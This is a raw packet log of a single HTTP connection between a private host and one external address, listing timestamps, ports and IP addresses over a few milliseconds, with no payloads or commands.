Apr 27, 2024 00:46:06.789778948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789778948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789792061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789799929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789814949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789815903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789829016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789835930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789840937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789849997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789865017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789874077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789882898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789895058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789906979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789913893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789932013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789942980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789947987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789978027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789985895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790015936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790029049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790064096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790066957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790097952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790131092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790164948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790190935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790204048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790226936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790244102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790255070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790267944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790308952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790319920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790334940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790364981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790366888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790395975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790426970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790445089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790458918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790463924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790481091 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790482998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790493011 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790503025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790522099 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790539026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790581942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790595055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790612936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790621996 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790631056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790635109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790647030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790671110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790699959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790712118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790723085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790730953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790747881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790762901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790792942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790806055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790817022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790826082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790829897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790838957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790843010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.790863037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790884972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.790977955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.791013002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.791043997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.791079998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.791106939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.791140079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.791142941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.791194916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.791268110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.791315079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.791336060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.791348934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.791368961 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.791390896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.791394949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.791414976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.791433096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.791438103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.791456938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.791457891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.791470051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.791475058 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.791488886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.791510105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.791574001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.791614056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.791649103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.791661978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.791676044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.791686058 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.791691065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.791697979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.791718006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.791731119 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.791733980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.791769028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.791802883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.791817904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.791836023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.791860104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.791892052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.791919947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.791928053 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.791956902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792007923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792045116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792056084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792068958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792090893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792097092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792109966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792145967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792152882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792182922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792331934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792365074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792375088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792397976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792409897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792422056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792443037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792462111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792514086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792526960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792550087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792561054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792570114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792573929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792596102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792618036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792650938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792668104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792680979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792689085 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792705059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792725086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792740107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792752981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792766094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792779922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792781115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792793036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792802095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792814970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792819977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792834997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792841911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792865992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792886019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792902946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792918921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792926073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792934895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792942047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792948008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792958975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.792960882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792982101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792994976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.792999983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.793013096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.793015003 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.793025970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.793056965 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.793072939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.793076038 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.793108940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.793226004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.793239117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.793262005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.793267012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.793279886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.793287992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.793299913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.793323994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.793493032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.793517113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.793529034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.793534994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.793550014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.793560028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.793569088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.793606043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.793607950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.793618917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.793631077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.793646097 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.793649912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.793657064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.793677092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.793697119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.793704033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.793744087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.793751955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.793781042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.793792009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.793797970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.793818951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.793829918 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794015884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794051886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794078112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794090986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794111967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794125080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794131041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794143915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794157028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794174910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794198990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794217110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794253111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794267893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794285059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794297934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794305086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794318914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794341087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794346094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794378042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794388056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794413090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794420004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794456959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794460058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794497013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794518948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794532061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794559002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794559002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794574022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794595957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794601917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794621944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794641018 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794652939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794687986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794706106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794744968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794759989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794773102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794794083 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794815063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794816017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794851065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794857979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794897079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794898987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794914007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794934034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794946909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794955969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794962883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794975996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794982910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.794996023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.794996977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795013905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795034885 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795058966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795084000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795098066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795123100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795140982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795151949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795152903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795175076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795181990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795206070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795216084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795222998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795234919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795252085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795259953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795279026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795291901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795418978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795454979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795460939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795480967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795494080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795497894 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795516968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795527935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795537949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795571089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795578003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795610905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795634985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795648098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795672894 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795686960 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795814037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795849085 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795856953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795869112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795888901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795909882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795938969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795955896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795969009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795974016 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.795984030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.795984983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.796005011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.796025038 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.796032906 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.796047926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.796049118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.796084881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.796093941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.796132088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.796135902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.796143055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.796164989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.796176910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.796530962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.796542883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.796561956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.796565056 CEST	49734	80	192.168.2.4	176.97.76.106
